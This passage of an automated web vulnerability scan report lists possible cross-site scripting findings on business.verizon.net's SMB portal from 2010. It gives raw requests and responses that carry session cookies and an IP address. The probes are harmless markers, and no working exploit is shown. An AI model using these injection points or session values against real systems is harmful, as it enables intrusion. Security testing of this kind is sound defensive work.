Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 115
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:18 GMT
Connection: close
Set-Cookie: SaasSessionID=TT0HMnKCTC1xFMnn1w4DqLhvHKnwZjzqkKPpt4zsKnHJHF4HhQF7!-1644393018; path=/

Resource /SMBPortal4370e(a)d757b73798/smb/mkp_landing_verizonBusinessRewards could not be resolved for locale null.

2.325. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7a24d(a)11f2ace25c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb7a24d(a)11f2ace25c/mkp_landing_verizonBusinessRewards HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 115
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:18 GMT
Connection: close
Set-Cookie: SaasSessionID=cbTWMnKC1j0B94zjwsL0JGJ9fPGLcYjLvM7dvjphM1wJbQkWWQSz!-1644393018; path=/

Resource /SMBPortal/smb7a24d(a)11f2ace25c/mkp_landing_verizonBusinessRewards could not be resolved for locale null.

2.326. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3ab4d(a)cc722564916 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards3ab4d(a)cc722564916 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 116
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:19 GMT
Connection: close
Set-Cookie: SaasSessionID=PbthMnKDpnJmN3mR55KwqYqtGnMP2nbLnJf8GGHpWgt2DhlWvWgM!-1644393018; path=/

Resource /SMBPortal/smb/mkp_landing_verizonBusinessRewards3ab4d(a)cc722564916 could not be resolved for locale null.

2.327. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 936cc(a)fc745ccf89f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal936cc(a)fc745ccf89f/smb/mkp_landing_verizonDiscountProgram HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 116
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:13 GMT
Connection: close
Set-Cookie: SaasSessionID=7pyrMnKdLXVW4VKgCMZhntXZZCclvspvKXLvrnQhND8xQSQthSRs!-1644393018; path=/

Resource /SMBPortal936cc(a)fc745ccf89f/smb/mkp_landing_verizonDiscountProgram could not be resolved for locale null.

2.328. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5a082(a)23a37059243 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb5a082(a)23a37059243/mkp_landing_verizonDiscountProgram HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 116
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:13 GMT
Connection: close
Set-Cookie: SaasSessionID=8v4nMnKdgmKmLgyhqZT2PxhT6nS1YBNP0WZs1hMyxTVgC4JRR5cv!-1644393018; path=/

Resource /SMBPortal/smb5a082(a)23a37059243/mkp_landing_verizonDiscountProgram could not be resolved for locale null.

2.329. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4a3dd(a)96362fb383a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram4a3dd(a)96362fb383a HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 116
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:13 GMT
Connection: close
Set-Cookie: SaasSessionID=rny2MnKdhG6J2hHMMTsR3pTmy0Jnrb86dFdhhhSq9mVKhnqDCMv3!-1644393018; path=/

Resource /SMBPortal/smb/mkp_landing_verizonDiscountProgram4a3dd(a)96362fb383a could not be resolved for locale null.

2.330. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9e876(a)e287d80b640 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal9e876(a)e287d80b640/smb/portletInstance_10 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 100
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:12 GMT
Connection: close
Set-Cookie: SaasSessionID=crv8MnKcx8VjnJGRTh5S1PqxlHJJ0NDFJkFvF34h4XnzGvLG5Yrp!-1644393018; path=/

Resource /SMBPortal9e876(a)e287d80b640/smb/portletInstance_10 could not be resolved for locale null.

2.331. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e615a(a)2f71a4facbe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smbe615a(a)2f71a4facbe/portletInstance_10 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 100
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:13 GMT
Connection: close
Set-Cookie: SaasSessionID=yGRwMnKdMM79cD1TxbDkHJMP5f8j3zFgSxr2vBXb3L1n4g3xwyMW!-1644393018; path=/

Resource /SMBPortal/smbe615a(a)2f71a4facbe/portletInstance_10 could not be resolved for locale null.

2.332. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ccc7(a)0aa77c31e5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_102ccc7(a)0aa77c31e5 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 99
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:13 GMT
Connection: close
Set-Cookie: SaasSessionID=xTvnMnKdYkyZG9nWMY91pH2x2X0QPBZn4Z9gwyqbsCly2gfktmQ2!-1644393018; path=/

Resource /SMBPortal/smb/portletInstance_102ccc7(a)0aa77c31e5 could not be resolved for locale null.

2.333. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 57a74(a)2b9dc44f403 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal57a74(a)2b9dc44f403/smb/portletInstance_11 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 100
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:14 GMT
Connection: close
Set-Cookie: SaasSessionID=Jj4yMnKpypZV1K9XC4BCbJvKGkZgMbNc4YF7jtVTl2f1G9jyyb0Q!-1644393018; path=/

Resource /SMBPortal57a74(a)2b9dc44f403/smb/portletInstance_11 could not be resolved for locale null.

2.334. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 67735(a)9f20f4c39e9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb67735(a)9f20f4c39e9/portletInstance_11 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
